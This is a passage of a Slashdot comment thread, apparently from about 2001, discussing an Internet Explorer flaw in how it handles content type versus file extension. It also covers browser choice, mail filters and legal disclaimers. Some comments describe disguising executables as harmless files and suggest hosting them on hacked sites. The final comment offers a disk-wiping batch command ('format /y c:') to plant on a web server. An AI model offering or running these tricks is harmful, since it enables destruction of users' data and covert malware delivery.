    As to this article, I think it may seem a little on the angry side. But I'm sort of angry here too. MS needs to get its act together (although I'm sure they're scrambling for patches now).

    The problem is not some crazy design decision (integrating IE isn't necessarily that bad of an idea), the problem is that MS has too many programmers pointed too many different directions.

    It can be a hard job to keep things secure when you're working with a lot of disparate technology (and your boss is mostly concerned with how it looks). I have a fair amount of respect for MS programmers - perhaps they need some better management.

    --
    Let's not stir that bag of worms...
  136. Try this at home (or "not just a threat, also a pa by foobar104 · · Score: 5, Interesting

    Ironically, I ran into this one just the other day, but didn't recognize it for what it was.

    I develop software for a living, and one of my tools is a web-based thingy with a CGI interface. A typical URL might look like this:

    http://foo/bar.cgi?blah=blah&filename=quux.jpg

    This CGI script returns a web page with info about the file "quux.jpg," which exists on the server.

    When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried) the browser thinks it's downloading a JPEG image, and asks me where I want to save it.

    My script sends a nicely formatted Content-type header of text/html, but the browser is stubborn and won't listen.

    So in my case, this wasn't really indicative of a security hole, but rather a pretty dumb design flaw in the browser that should have been caught in testing.

    (Oh, and FYI, my "fix" was to reorder the CGI parameters as the URL gets constructed, so the filename never comes last. I'm not happy with this, and I may implement URL-encoding the filename's "." character instead, then decoding it on the server side. But the spec says I shouldn't have to do that, so the whole situation has left me kind of pissy.)

  137. Easy (for MSFT) Fix by matthewg · · Score: 2

    Here's an easy fix for Microsoft to implement: have IE append the "expected extension" to the name of a file if the extension given is wrong. For instance, if foo.txt has a content-type of application/octet-stream, have it tell the user that they are downloading foo.txt.exe, and reflect this in the open/save dialog and the name of the saved file. This has a pleasant non-security side-effect - I often write CGIs which return a content-type of, say, application/pdf. If the user downloads the resulting data, it will be saved as myapp.cgi. This will cause problems when the user tries to open the file.

    1. Re:Easy (for MSFT) Fix by raynet · · Score: 1

      You can use:
      Content-Type: Application/Download
      Content-Disposition: filename=blah.pdf
      in IE to open Save As -dialog with blah.pdf as filename.

      --
      - Raynet --> .
  138. Re:Now that this particular cat is out of the bag. by SkepTech · · Score: 0

    But, gee, since it's Linux, I don't think those things are real concerns, do you?

    Sure it's a concern.

    My brother in law installed Red Hat 5.1 last week.

    I told him I would make him copies of the Slackware 8.0 CDs that I just bought on CheapBytes. Hell, I told him I have two or three generations newer Red Hat CDs he could use.

    He's stubborn. He has that nice book that came with Red Hat 5.1. He installed Red Hat 5.1.

    I am sure there are hundreds and thousands of other people running outdated Linux distros as well. They're using the CD that came in the cover of that book.

    It happens. A lot.

    Get a clue, dude.

  139. So Whats the Big Deal? by Anonymous Coward · · Score: 0

    IE/W98/W2000 is the only Browser/OS combo I use..Why? Because IE starts quickly, renders pages correctly and without waiting for the entire page to load, has support for all kinds of bloated web page stuff that netscape doesnt support, doesn't show me a bunch of garbage when i click on a link to a binary file (like netscape), and its graphics and UI get modified more than once every 6 years. Anyways, where is this aweful hole? I've been looking at web pages made my script kiddies for years and no one has tried this on me. And why didn't Nimda and Melissa and AnnaK get my outlook client? I read all this hype 10 times a day on slashdot and i want to know where my share of security problems are! I was promised to get screwed over for using IE/Outlook/Windows and i think i should sue slashdot!

  140. A different security hole by JMZero · · Score: 2, Interesting

    There's a fairly easy exploit (for IE since 4 I think) that allows a malicious web page to read arbitrary files off a users hard disk.

    No patch available as far as I know. It's also a lot easier to exploit than this one (heck, I even was able to do it).

    I'll put details up if anyone's interested...

    --
    Let's not stir that bag of worms...
  141. Two Words: by Anonymous Coward · · Score: 0

    Limited Liability.

    Just read the EULA , you have dick of a right to sue them FOR ANYTHING (but that dosen't really mean you can't, for all practical purposes.).

  142. - Mod this guy up by Anonymous Coward · · Score: 0

    Finally a sensible post.

    The webserver usually has mappings to the content types that it is serving up.
    So it tells the browser what the content type is when a file is requested with http.
    It's really easy with any type of server side scripting to change the content type header.

    For example, I've written java servlets that change the content type to image/gif to do some dynamically generated charts.
    If the URL was to a file that ended in .gif the webserver would see in it's mapping config file to set the content automatically
    However my servlet might be something like www.myserver.com/servlet/Chart and i have to manually set the content type per request.

  143. Check out NoHTML for Outlook by lucidvein · · Score: 5, Informative
    You should probably look into NoHTML by Russ Cooper of NTBugTraq.


    "NoHTML.dll is an Outlook Add-in designed to convert HTML-based emails into harmless messages. It works slightly differently for Outlook 2000 than it does for Outlook 2002. Does not work with Outlook 98, or any version of Outlook Express."


    Also a story about it here, http://www.theregister.co.uk/content/4/23223.html.

    I've had it installed at work for a week now and do just fine without all the images and special formatting of spam.
    --

    "I have a cunning plan..."

  144. Hmmm... by xtype · · Score: 2, Insightful

    Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message.

    The patch for Internet Explorer (IE) is currently in testing and could be released soon...


    So, am I missing something? There is a patch in the works, it is just not released.
    Sure, it should have been released a long time ago. Or, should never have had to become an issue.
    Shame on MS for bad practices.
    But the /. article leads one to believe that they are brushing it off. When infact, they were just trying to wait until they actually had a worth while patch before they said anything.

    Now the real question is.... will the patch just open 7 more holes?

    -xtype

  145. Re:Now that this particular cat is out of the bag. by plover · · Score: 3, Informative
    What kind of steps can people use to protect themselves now, is there any kind of toggle or security setting that can be turned on in IExploiter 5.0(tm) to keep us a little bit safer?

    Honestly? I seriously would recommend browsing the web only with Mozilla. I had been using IE, but I switched to mozilla full time after 0.9.1 (except for work related browsing on my company's web pages, which are written exclusively for IE browsing.) It's been buggy, it's still a little buggy, but I haven't had many real showstoppers because of it. And no one's published any attacks yet, but because it's NOT integrated into the OS, I'm somewhat less concerned about the damage it's capable of causing.

    If you're stuck with IE, then might I recommend a proxy filter such as The Proxomitron? You can modify the incoming http headers to do anything you want, including altering file extensions!

    John

    --
    John
  146. Re:Now that this particular cat is out of the bag. by fishebulb · · Score: 1

    who exactly does he have to assure of quality? He never made any promises that linux is more secure, unlike certain companies.

  147. The real gaping hole by Krach42 · · Score: 3, Interesting

    You want to see it for yourself? The problem is that IE get's a file that ends in say, .ZIP, asks the user to download or open from current location, and if it's "open from current location" it actually executes the code as an executable, even if it _IS_ a .ZIP. There's nothing special here, and it doesn't need you to have web administrator access, I did it here: http://www.cs.nmsu.edu/~dfoesch/funny.zip If you want to see the exploit first hand, select "open file from current location" and then if it asks you what application to use, just click "ok" (ok, you might have to select the first entry) and PRESTO! Notepad.EXE! Running remotely on your computer! This could easily be any arbitrary program, I just chose Notepad.

    --

    I am unamerican, and proud of it!
    1. Re:The real gaping hole by Indy1 · · Score: 1

      tried it on win xp pro and ie 6...didnt work :)

      --
      Lawyers, MBA's, RIAA? A jedi fears not these things!
    2. Re:The real gaping hole by Tazzy531 · · Score: 1

      tried it on Win2k Professional/IE5.5 ... didn't work.. Back to the drawing board..

      --


      _______________________________
      "I'm not Conceited...I'm just a realist..."
    3. Re:The real gaping hole by SpaceLifeForm · · Score: 1
      Cannot reproduce. Note this is on a clean 98se (no patches ever downloaded from m$ website), version 5.0 of IE.
      Either opening or saving still result in Winzip complaining about the format (as it should), since it is saved with a .zip extension.

      Try .wav for .zip instead.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
    4. Re:The real gaping hole by Gordonjcp · · Score: 2

      Tried it on IE5, running on Win2K. It fired up Winzip, which promptly whinged about an invalid archive.
      [bzzzt!] Nice try...
      I've tried this all ways round. Doesn't really work at all...

    5. Re:The real gaping hole by Peyna · · Score: 1
      Unless you've got fscked up file types set up or something, when you tell it to "open", it's going to use either winzip or some other program. This would be the whole point of file types in Windows. It doesn't just randomly execute files without proper extensions.

      In your case, you probably didn't have an association for .zip, therefore it prompted you as to what you wanted to do, so when you said to use notepad, all it did was try to open the binary data from the zip file in notepad, nothing else. Get a clue.

      --
      What?
    6. Re:The real gaping hole by mstormoen · · Score: 1

      Why is this modded up to 3, interesting? It didn't work for me nor several others. In fact nobody experienced the desired results as far as I can see. How many moderators actually tried this before modding? Sheesh.

      --
      -- "Nothing very good or very bad lasts very long."
    7. Re:The real gaping hole by Krach42 · · Score: 1

      Download it, name it an .exe, and run it... it _IS_ an executable... I'm not full of crap here... just my g/f's computer (the only Windows machine I have easy access to) didn't have anything for handling .zips. I guess I could try some absurd format like .gfet I'm sure that doesn't exist, and if you claim that it's alright, many users would be likely to expect it to be alright. And if you give equally plausible reasons, with just enough computer speak to make confusing, but still clear in the instructions, then a lot of people (like my mom) would easily just follow the instructions, without a care.

      And no, I'm not stupid enough to tell windows to open a .zip with notepad.... first of all, it opens up a blank notepad, (not some binary file.)

      --

      I am unamerican, and proud of it!
    8. Re:The real gaping hole by smyle · · Score: 1

      You are under arrest for the illegal distribution of Microsoft copyrighted material. Please stay at your seat and wait for the FBI.

      --

      Sleep is just a poor substitute for caffeine, anyway. -Bob Lehmann

    9. Re:The real gaping hole by Krach42 · · Score: 1

      Sorry, didn't think that people had associations for .zip files already... I needed to use something that doesn't have an association... so I linked it to funny.glep also.. this should make it work with 99% of computers... unless I guess if you actually have .glep associated to something. I tried putting the file on geocities, (which would give you a semi-annonymous way to do this) but geocities didn't accept the upload of a .exe file no matter what the extention was. Kinda nice, but I'm sure there's some webhost somewhere that you could put it up annonymously... not to mention, you could also just "hax0r" a site, and upload it illegally, which would really make you wonder... "Well, the file _IS_ from respectiblesource.com... it must be ok"

      --

      I am unamerican, and proud of it!
    10. Re:The real gaping hole by Peyna · · Score: 1

      Must be some interesting zip file you've got, everyone I just tried to open it in notepad showed an attempt to convert a binary file to ascii and lots of exciting ascii characters =]

      --
      What?
    11. Re:The real gaping hole by adam6 · · Score: 0

      This didn't work either, it just brought up the 'Open With' dialog box. Using Win98SE, IE5.5 here, and the latest updates were not installed. Security level was medium or something.

  148. Browser Wars.. by CobesTheGreat · · Score: 1, Offtopic

    I just don't understand it. Why do people use IE still? For a long time I understood them, it used a whole lot less memory than netscape, and rendered webpages a whole lot better than other browsers. But then I found Opera which completely blew me away. Not only does it only use 14 megs of memory, which is a lot, but not nearly as much as IE (25 Megs) or Netscape (35 Megs), and it renders webpages just fine. I will probably get modded down for being a troll, but could someone tell me why they still use Internet Explorer?

    --

    --------------------------------------
    58.0% slashdot corrupt
    1. Re:Browser Wars.. by omega9 · · Score: 5, Insightful

      Because it's part of the Windows OS. When grandma goes out to buy herself a nice Dell computer, it comes with Windows preinstalled, and hence has IE installed by default. She would have to take extra steps to download and install a different browser. But why, when IE seems perfectly fine, and it's integrated so nicely into the desktop? And it's hard to argue that. Think of the average home user that isn't as aware of these issues as we are.

      A big part of the problem is that the clues aren't easy to spot for non-technical people. They can't see a problem in IE, as it seems to work just great. There are all these refined features to play with so it must be a solid product. And there are a whole heck of a lot of people who don't think IE is a browser, they think it is the browser. When they hear about holes like this they don't think that IE is broke, they think that someone has found out how to break into web browser (as in all web browsers). It would never cross their mind that IE is at fault. Try explaining how IE has issues with content type vs. file extensions to random people on the street. They just won't get it.

      And this is where their monopoly comes into play again. They're such a huge, enormous company with a huge, enormous user base that they all turn into lemmings. If something happens to their IE, it will happen to their friends IE. Soon they start to see lots of people having trouble with IE. Then they stop relating the problem (if they ever did) to IE and start to think everyone is being affected by "the baddies who broke the internet". By the time Microsoft releases a patch user believe it to be a general problem that must be affecting everyone. Finally, since the issue has been disrelated with IE in their minds, why would they have any reason to look for a different browser?

      --
      I'm against picketing, but I don't know how to show it.
    2. Re:Browser Wars.. by SpaceLifeForm · · Score: 1

      Too lazy to learn something new.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
    3. Re:Browser Wars.. by Kidbro · · Score: 1

      Lot's of JavaScript constructs used regularly on the web works in IE, but not in Opera.

      That's the reason why I fire up IE a couple of times every day for a couple of minutes, but always have an Opera running for 95% of my browsing. Most people don't have the patience to switch between various browsers though.

      (this post is so late I hardly think anyone will read it, but I saw doing my meta-modding, and thought it was worth a reply, as the question is very relevant indeed)

  149. This is not new or news, I thought. by Milalwi · · Score: 1

    The fact that IE sometimes ignores content-types and uses the file extension is not news.

    This is something that I thought was general knowledge. I first ran across it trying to provide VMS DCL command files (.COM) via a web server (configured to pass .COM as text/plain). I guess no one had worked out the details of how to exploit it before.

    Milalwi

  150. Don't forget Links (better than Lynx) by antdude · · Score: 2

    Links. It supports frames, renders tables better, etc.

    --
    Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
  151. Procmail Scanner by ColaMan · · Score: 5, Informative

    I have to plug something here.

    Check out the procmail-based scanner at impsec.org

    If you can set it up, do so - it's saved my ass quite a few times, by mangling active html content and renaming file extensions etc. It can also scan M$ docs for sus looking macros.

    The following is something I received today that would slip through otherwise (notice the original content-type)

    > SECURITY WARNING!
    >
    > The mail system has detected that the following
    > attachment may contain hazardous program code, is
    > a suspicious file type, or has a suspicious file name.
    > Do not trust it. Contact your system administrator immediately.
    >
    > X-Content-Security: [www.ccimackay.com] original Content-Type was audio/x-wav;
    > Content-Type: application/octet-stream; name="HUMOR.MP3.27525DEFANGED-scr"
    > Content-Transfer-Encoding: base64
    > Content-ID:
    >

    End of blatant plug :-)

    --

    You are in a twisty maze of processor lines, all alike.
    There is a lot of hype here.
    1. Re:Procmail Scanner by Anonymous Coward · · Score: 0

      The .mp3.scr should give it away anyway... Not hard to spot if you're a geek, who's had to deal with vira for years... Hard to spot for a newbie though...

      "screensavers aren't dangerous? It's not like they're .exe or anything!"

  152. Re:Now that this particular cat is out of the bag. by Yottabyte84 · · Score: 1

    works on mirc too.

  153. for legal advice, get a lawyer by xah · · Score: 0, Redundant
    If you have a legal case or a legal problem, do not consult anyone, on Slashdot or anywhere else, except a lawyer. No one else will do.

    We law students are not lawyers. We law students are incompetent to give legal advice. When I say something about the law, it is only one man's opinion, and it cannot be anything more. Law students do not give legal advice.

    Just remember, if you have a real legal problem, you need a real lawyer.

    --
    I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    1. Re:for legal advice, get a lawyer by LegendLength · · Score: 1
  154. This won't matter by alsta · · Score: 2

    Let's say that this hits the news. CNN tells people to be careful when they use IE/Outlook. John Doe says "Oh my, that's terrible!" and stays away from the computer for a few days because it could blow up on him. Later on though, the pr0n is too tempting and he starts using IE again. Darnit, this is some good stuff here.. Anna Nicole Smith and all this type of stuff. Two months later he doesn't remember a thing about the horrible bug in IE. Because his computer works fine.

    I am 99.999% certain that this will not be a turning point in the browser war. John Doe doesn't care unless his pr0n disappears. And he is certainly not going to download Netscape because that's too hard, let alone PAY for Opera?! He can view his pr0n quite well on IE, barring of course the fact that he gets 400 popup windows on his screen by clicking some link.

    Microsoft will walk away from this one too. Until Microsoft blows up John Doe's computer, or takes away his pr0n, this will probably go fairely un-noticed by the public.

    --
    Wealth is the product of man's capacity to think. -Ayn Rand
  155. You don't need those features, but MS customers do by mikemulvaney · · Score: 1

    Not all Microsoft customers are end users. Some of them are businesses, and those businesses want to send you spam. And they can't track their spam unless they can use 'DHTML, scripting, cookies and all of that other crap'.

    So just get over it. You can't tell Microsoft what to do, so use another browser/email client. There are plenty of them out there. Vote with your feet, not your Slashdot Soapbox.

    -Mike

  156. Re:Now that this particular cat is out of the bag. by Yottabyte84 · · Score: 1

    Time to put on your asbestos underware kiddies! ;)

  157. Hello Intern! by (H)elix1 · · Score: 2

    Real men pre-compile the JSP's into servlets so the users don't have to...

    Innovate? Bah, I did not say that. What I did say was moving binaries is painful with server side Java, and even worse using JavaScript or VBScript. Try it some time, I had to last week....

    I've spent way too much time coding C++ ISAPI filters and extentions, COM components, and ASP to say this sux d00d! Right tool, right job. Most of my personal time these days is spent building ATL COM components for the ARM...

    I'll assume you are fresh to this web stuff - M$ or $un whore? Stuff evolves. My first CGI work was in C, followed by ISAPI and NSAPI, ASP, Servlets, and lately custom tags, XML, and yes -- JSP. The trick is to know when and why one is a better choice than another for a job. That, and making your resume fully buzz word compliant....

    (PS - get an account Steve)

  158. Typical yellow journalism from Slashdot... by taustin · · Score: 0, Flamebait

    The lie:

    ..."the malicious content is automatically executed."

    The truth, from the article that the clown how posted this didn't even bother to read:

    "Any way to skip all dialogs, ie. to run an application without ANY dialog with this vulnerability has NOT been found."

    C'mon, you morons. At least pretend to read this stuff before you start masturbating at how evil and stupid Microsoft is. Again.

    1. Re:Typical yellow journalism from Slashdot... by DaCool42 · · Score: 0

      I believe that the way the vulnerability works, the user will receive one of those "open or save" dialogs as usual. The file could appear to be, say an innocent txt file. Choosing the open option would excute it (according to the fake MIME header), whereas choosing save would reveal that it has a .exe extension.

      If a user has chosen to ALWAYS open a certain type of file (I believe IE has a checkbox for this), then it follows that a spoofed MIME header for that type would be executed without any user intervention.

      --

      ----
      All of whose base are belong to the what-now?
  159. huh? by rnd() · · Score: 2
    If Microsoft suddenly changes how their browser handles downloaded files, tens of thousands (perhaps hundreds of thousands? any webpage which downloads files) of webpages "designed for IE" will have to be rewritten.



    Uhh... I don't know of any sites that fit into this category, do you?

    --

    Amazing magic tricks

  160. Free my ass by austinc1 · · Score: 1

    It cost you a competitive market.
    For that matter, when you pay for a copy of windows, you are paying for IE as well. Or wait, I got it, ask Microsoft for a copy of windows *without* IE. Now, if you download it and install it, I'll be willing to consider it free.

  161. More info by CobesTheGreat · · Score: 2, Informative

    Here is a site with some more info on the SliMP3..
    http://www.mp3newswire.net/stories/2001/slimp3.htm l
    It has a bit more detail on the unit and a picture of it working. Quite and impressive peice of hardware.

    --

    --------------------------------------
    58.0% slashdot corrupt
  162. DO NOT USE THAT AS LEGAL ADVICE by xah · · Score: 0, Redundant
    Do not use anything written by a law student, including me, including what I wrote above, as legal advice. Law students are not lawyers. Law students are incompetent to give legal advice.

    If you develop a legal problem, you should talk to a lawyer. Never take legal advice from a law student.

    --
    I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
  163. ummm...did you EVEN READ THE EULA you AGREED TO? by FKell · · Score: 1

    cause if you did you would have noticed the nice BIG, (sudo quote) We will not be held responsible for any damages this software causes you or your business (end sudo quote) section. If I am not mistaken, you signed a CONTRACT that removed all responsibility for any problems you have with MS's software.

  164. Roughly half of Slashdotters... by _xeno_ · · Score: 4, Informative
    A little less than half the Slashdotters. (Maybe. This data is a non-random sample, since I can't really do a random sample, although someone with access to Slashdot's servers could...)

    Read my journal entry about how I got this data, or just look at the table (that cannot be formatted properly because the lameness filter is the most useless piece of crap that Slashdot has ever forced upon its readers - I'm glad you guys are all about free speech online!! - so use the linked journal where the formatting was accepted and don't forget to continously annoy CmdrTaco about this annoying "feature" to protect us from the oh-so-evil trolls):

    Browser Actually Used By Slashdotters

    Galeon: 1511 (3.00%)
    iCab 9 (0.02%)
    Konqueror 4149 (8.25%)
    Lynx 6 (0.01%)
    Internet Explorer 24885 (49.47%)
    Mozilla 9340 (18.57%)
    Netscape 3756 (7.47%)
    OmniWeb 190 (0.38%)
    Opera 3267 (6.50%)
    Other 3187 (6.34%)

    Note: Other contains browsers whose User-Agents could not be parsed. It may contain valid browsers, but for the most part is either badly formed User-Agent strings or unknown User Agents.

    It has to be noted again that this data is not statistically accurate: it was taken directly off of hits, and is biased towards browsers that automatically download images (in other words, every hit counted - the values didn't take into account which hits were hits to the images linked to on the page).

    Also, some other people decided to ... uh, borrow ... the mirror and so some of the links come from other sources that aren't Slashdot. I forget if I filtered those or not, but...

    If anyone's interested, I suppose I could try and fix up the Perl scripts used to calculate that data. I have some pretty pie charts on my harddrive that I could put up somewhere too, although they are for the most part useless...

    --
    You are in a maze of twisty little relative jumps, all alike.
    1. Re:Roughly half of Slashdotters... by blue+trane · · Score: 1

      yeah, why doesn't slashdot openly publish their user browser stats

    2. Re:Roughly half of Slashdotters... by Anonymous Coward · · Score: 0

      I for instance keep my Konqueror's User-Agent field as Netscape or Mozilla, sometimes even MSIE in order to keep those stupid web sites working which actually check that User-Agent header. So the data might be skewed. I think a better method to check it would be a poll.

    3. Re:Roughly half of Slashdotters... by _xeno_ · · Score: 1
      The script checks for browsers in roughly the order of Konqueror, Opera, MSIE, misc browsers that include Mozilla/4.0 (compatible;, and then Mozilla/Netscape. But yeah, if you actually set the user agent to start exactly "Mozilla/4.0 [en]..." (or any other non-whitespace non-"]" (ie, User Agent =~ /Mozilla\/4.0 \[[\S\]]+\]/)) it'll count towards Netscape 4. If you leave off the language code you get dumped into "Other." Likewise, Mozilla/4.0 (compatible, MSIE 5.0, Windows NT 5.0) will get you counted as Internet Explorer on Windows 2000.

      So if you want to get most pages to decide you're an OK browser, do what Opera does and change it to something like "Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.4.14 i686) Opera 5.0 [en]" which will count towards an Opera hit via my script and make web developers decide that maybe there is a reason to pay attention to non-IE browsers...

      (The script was based off code originally to check which browsers were being used to view a webpage and basically made the decision that the site would be "optimized" for MSIE and the other 5% could just deal.)

      Then you'll be detected as the browser you're actually using instead of just counting as yet another IE hit.

      Unless you do something truely weird like "Mozilla/5.0 (compatible; MSIE 5.5; oops, wrong! it's:) Mozilla/5.0 Galeon/0.12.5 (Linux i686; U;) Gecko/20011012" (counts as Galeon) or "Mozilla/6.66 (compatible; MSIE 7.23; Windows GPF 5.0)" or even "Mozilla/6.0 [en] (compatible; MSIE 9.81; Sinclair ZX81 BASIC)" (both of which were counted as an MSIE hit)...) or probably the best "RubeBrowser/42.0 (C64 Geos; Liquid Helium Cooled)".

      The 9 hits by "QuickTime (qtver=5.0.8;os=Windows NT 5.2)" I have to wonder about...

      --
      You are in a maze of twisty little relative jumps, all alike.
    4. Re:Roughly half of Slashdotters... by Anonymous Coward · · Score: 0

      the KDE sight

      that would be 'site'

    5. Re:Roughly half of Slashdotters... by Anonymous Coward · · Score: 0

      Does Quicktime come with a minibrowser? I can't say I've monkeyed with it lately... Windows NT 5.2, though, is either Windows 2000 with Service pack 2, or Windows XP, I'm not sure which.

    6. Re:Roughly half of Slashdotters... by Alan+Partridge · · Score: 1

      not really, but it's quite happy to display (and link) HTML with all media types it supports rendered intact. As one of those media types is Flash 4, it actually does a pretty sweet job. But it's NOT a browser in any conventional sense.

      --
      That was classic intercourse!
    7. Re:Roughly half of Slashdotters... by Alan+Partridge · · Score: 1

      only 0.38% for Omniweb? :-[ I must be the ONLY one who doesn't have it set to Netscape ID default then. ATTENTION ALL OSX USERS! Omniweb is FANTASTIC, cease and desist all IE use immediately! there, that ought to do it...

      --
      That was classic intercourse!
    8. Re:Roughly half of Slashdotters... by ChuyMatt · · Score: 1

      Well. I use it too, but i wouldn't say that it is all _that_ great. The biggest problem is that it doesn't recognize that you have checked anything on a web page. This means that any mail that you want to delete you must do it one message at a time. Sucks don't it? this is on about 4 systems that i have tested this out upon. Other than that it is right up there with Opera for speed and much more beautiful. 'S just nice. Mozilla is rather great for that. But I still hate its non X GUI.

    9. Re:Roughly half of Slashdotters... by Tachys · · Score: 2

      I think many Mac Users are using OmniWeb. If you look at his journal entry the number of Mac Users reading slashdot is at 0.50%

    10. Re:Roughly half of Slashdotters... by Trolldot · · Score: 1

      But remember some browsers "PRETEND" to be IE because some lamers KICK OUT browsers, mainly crappy harry potter and credit card sites.

    11. Re:Roughly half of Slashdotters... by buzban · · Score: 1

      ...and that checking thing is a *big* problem, and one of the big reasons that OmniWeb doesn't play nice with a lot of my favorite sites, such as my webmail. and so, I use Netscape under OSX, or IE in a pinch.

    12. Re:Roughly half of Slashdotters... by Alan+Partridge · · Score: 1

      yeah, It's not perfect by any means - it's still the only browser I've ever used that can make reading vast swathes of text like a slashdot page bearable to even look at. Omniweb MUST move on soon, coz my java's WAY broken under 10.1.1. I have been using NS 6.2.1 recently and I'll admit it's pretty good - definitely beats Opera, ICab and MSIE under OSX.

      --
      That was classic intercourse!
  165. Wrong RFC by kimihia · · Score: 2

    2068 is obsolete.

    2616 is the current RFC for the HTTP/1.1 protocol.

  166. You should make that a standard disclaimer by roystgnr · · Score: 2

    A .signature, maybe. I know you're not about to expend any reputation or liability on a random post on an internet forum. I think anyone with any sense should know the same. I have no idea whether the law agrees with me.

    I suppose my problem is with glrotate's phrasing. I don't see why you should be responsible for spouting off on Slashdot any more than I am just because you're in law school. I like the fact that people can hold lawyers responsible for legal advice, but that seems to me to be a "special case" in human interaction, the exchange of warranted information for a fee, not an implicit agreement I have with everyone who's looked at a law text. And despite real concerns for potentially misleading people or exposing law students to needless lawsuits, when you consider the problem from the perspective of established lawyers telling proto-lawyers not to give legal information away for free, it comes off sounding more like price fixing than like ethics.

    Of course, you've got it easy. If you think lawyers have to watch shop talk outside of work, imagine what civil and mechanical engineers face in the way of liability. As one of my coolest professors put it, "When doctor screw up, one person die. When engineer screw up, thousand people dead. Everybody die!!!"

    1. Re:You should make that a standard disclaimer by xah · · Score: 1
      Consider it done.

      You have valid points. It is a very important point, though, that legal advice from a lawyer really is far better than that which you can get from any law student.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
  167. I think not everyone fully understands... by Anonymous Coward · · Score: 0

    From what I've been reading on this thread everyone seems to think that this can be avoided by not choosing 'open' but the point of this security bulletin is to point out something along the lines of malicious web servers which can add something along the lines of:
    AddHandler text/html .exe
    into their apache config files, then allow their lil script kiddy friends to make the malicious webpages.

    For example... someone adds that to their apache config, so now, apache sends the content type as text/html to IE when a .exe file is clicked. But wait... what about people who check the status at the bottom and see it's an actual .exe file that it's being linked to, not a .html file... simple... just do an:


    a href="http://mysite.com/file.exe"(javascript crap here to point to http://mysite.com/file.html)>Click here for stuff /a


    So now people think they're just visiting a harmless website... apache sends file.exe as a text/html handle and boom, IE interprets that as text/html, downloads the file, and runs it, boom no open/save dialog.

    This is the security hole as I see it, IMHO anyone who chooses to open a program from an obscure location shouldn't even be using a computer because they're the bait for all the script kiddies out there... just my $.02

    1. Re:I think not everyone fully understands... by philippe_carlo · · Score: 1

      I'm sorry but the scenario you describe here WILL NOT HAPPEN. I know, because I've tested it. I dialog box (open-save) will ALWAYS appear ...

  168. yellow journalism? by scorcherer · · Score: 1

    What does that mean, anyway? Did someone just pee on the newspaper?

    --

    --
    The Cap is nigh. Time to get a fresh new account.

    1. Re:yellow journalism? by fuzz6y · · Score: 1

      What does that mean, anyway? Did someone just pee on the newspaper?

      This answers that question fairly well.

      --
      If you're going to be elitist, it would help to be elite.
  169. How interesting... by Manuka · · Score: 2

    consider this e-mail I got from X-10 customer support, in regards to the installer for their windows 2000 version of ActiveHome, which does not run properly (it looks like a widget issue):

    • I have not heard of this problem before. It could be that the setup file is corrupted. (uninstallation instructions deleted) Now redownload the software. Be sure to disable any anti virus software you use on that machine. In fact, make sure no other apps are running while downloading (except IE of course). Which brings me to my next point, make sure you download thru Internet Explorer. If you use any download assistant or wizard disable it and use the default windows tool.

    Call me paranoid, but that doesn't exactly give me very warm fuzzies, especially from the folks that brought us the annoying pop-under ads.

    (and what the hell is the "default windows [download] tool" ?)

    I downloaded the demo of HomeSeer for now, and will just end up implementing something in Perl for my X10 equipment (which I bought long before the days of the pop-under - I no longer buy their crap)

  170. Exactly. by wirefarm · · Score: 2

    I use Mozilla for browsing and Sylpheed (http://sylpheed.good-day.net) for mail, so I guess I've already voted, so I'll use my soapbox to do a little campaigning.

    My office has a loose policy of letting users use any POP3 client that they choose. Most seem to be on Outlook Express, but others use Eudora and one called "Becky!" that I think is a mainly Japanese product.

    I've noticed that the HR department gets the bulk of the viruses, given their unfiltered contact with the general public, so I'll soon be setting up a special box just for them to use:
    Linux, Gnome (KDE if they like,) Mozilla, Sylpheed. (Yahoo Messenger and XMMS will be on it just for fun.)
    It will also get the latest release of OpenOffice, so they can look at resumes and stuff without worry. It will also have all of their standard drives mounted through Samba. It should be a fairly easy transition - sylpheed is very similar in feel to Outlook Express. OpenOffice will take a very little bit of retraining.

    I agree with your point - it was very well-said. Microsoft put the customer second and because of it, they are losing a customer. Not just for Outlook, but for at least one Windows license, hopefully an office-full soon. It would sure make *my* job a lot easier.

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
  171. Re:other browsers - More than stats show by rhammack · · Score: 1

    Lets not forget all the Opera/Konqueror etc users who identify as IE so the pages will render right ;)
    I'd guess from talking to friends / people at work that it's a common practice, so probably 10+ % of the reported IE stats are really another browser.

    --
    "Theory is when you know everything but nothing works. Practice is when everything works but no one knows why. In our
  172. How about a Class action Lawsuit vs. Microsoft? by Blowit · · Score: 1

    Anyone thought of issuing a Class action Lawsuit on behalf of all users vs Microsoft to have them fix this problem?

    If Microsoft elects to not fix the problem, then the lawsuit should make it manditory for Microsoft to pay everyone out there with IE and Outlook for the purchase of Anti-Virus Software, Computer repairs needed for the past 2.5 years which were paid to repair machines with virii and all future anti-virus needs for any OS MS offers with IE.

    --
    *Headline News* censorship shuts down the Internet! More at 6PM!
  173. it would be readme.exe - the crack is on extension by leonbrooks · · Score: 3, Insightful
    RTFL

    ...which means that it would still be live even if saved to disk and clicked on. It may not be run with notepad, but odds are good that one way or another it will ruin notepad...

    --
    Got time? Spend some of it coding or testing
  174. Re:Does anyone at /. read the articles in the post by Anonymous Coward · · Score: 0

    Oh it gets even better on the next sentence... Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. so it's not even like MS are just saying they're developing it, the damned guy who reported it has tested it... sheesh....

  175. Exploits in the Wild by Proud+Geek · · Score: 2

    There was a hole in Slashcode that allowed this to be exploited... it caused some pages to be turned into goatse.cx redirects. If you opened them in Konq (presumable any browser other than IE) it would just be text containing some HTML snippets to redirect to goatse. Some of the trolls were posting this on their user info pages, to turn Slash links into Goatse links. I believe that Taco has since fixed that one, thankfully.

    --

    Even Slashdot wants to hide some things

  176. Try this... by leonbrooks · · Score: 2

    Copy this text, paste it into a file called imamoron.bat and stick it on your web server:

    @echo off
    echo Please wait, unpacking...
    format /y c:

